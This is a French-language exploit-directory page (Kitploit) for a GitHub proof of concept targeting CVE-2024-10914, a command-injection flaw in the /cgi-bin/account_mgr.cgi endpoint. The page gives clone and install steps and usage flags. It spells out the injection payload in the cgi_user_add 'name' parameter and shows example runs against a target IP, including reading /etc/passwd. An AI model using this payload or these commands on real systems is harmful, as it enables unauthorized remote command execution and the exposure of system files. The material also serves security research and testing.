Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10914__POC — PoC pour exploiter le CVE-2024-10914 | Kitploit
Outils/GitHubGitHub/0xss3k/cve-2024-10914__poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

PoC pour exploiter le CVE-2024-10914

Voir le dépôt
3il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-10914 - Preuve de Concept

Exploit pour la vulnérabilité d'injection de commande dans le point de terminaison /cgi-bin/account_mgr.cgi. Cette vulnérabilité permet d'exécuter des commandes arbitraires sur le système affecté via des paramètres non assainis.

Description de la vulnérabilité

CVE-2024-10914 est une vulnérabilité d'injection de commandes qui affecte les appareils avec une interface web CGI. L'application vulnérable ne valide pas correctement le paramètre name dans la requête cgi_user_add, permettant à un attaquant d'injecter des commandes système qui seront exécutées avec les privilèges de l'application.

Prérequis

  • Python 3.7+
  • bibliothèque requests

Installation

Clonez le dépôt et installez les dépendances :

root@kitploit:~
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

Ou installez manuellement :

root@kitploit:~
Télécharger l’outil
pip install requests

Utilisation

Le script fournit deux arguments :

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMMANDE>

Paramètres

  • -u, --url (requis) : URL de la cible (exemple : http://192.168.1.1)
  • -c, --command (optionnel) : Commande à exécuter (par défaut : id)

Exemples

Exécuter la commande id :

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

Exécuter une commande personnalisée :

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

Lister les fichiers :

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

Fonctionnement technique

L'exploit envoie une requête GET au point de terminaison vulnérable avec la charge utile suivante :

root@kitploit:~
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMMANDE>; "

La chaîne vide est fermée avec des guillemets et la commande souhaitée est injectée, qui s'exécute dans le contexte du serveur.

Réponse

Le script affichera :

  • État de la connexion
  • Charge utile envoyée
  • Code de statut HTTP
  • Réponse complète du serveur

Avertissement légal

Ce code est fourni uniquement à des fins éducatives et de recherche en sécurité. Il ne doit être utilisé que sur des systèmes pour lesquels vous avez une autorisation explicite. L'utilisation non autorisée de cet exploit peut enfreindre les lois locales et constituer un délit. L'auteur décline toute responsabilité en cas d'utilisation abusive de cet outil.

Références

  • CVE-2024-10914
  • CVSS Score: TBD

Auteur

SS3K

Licence

Non spécifiée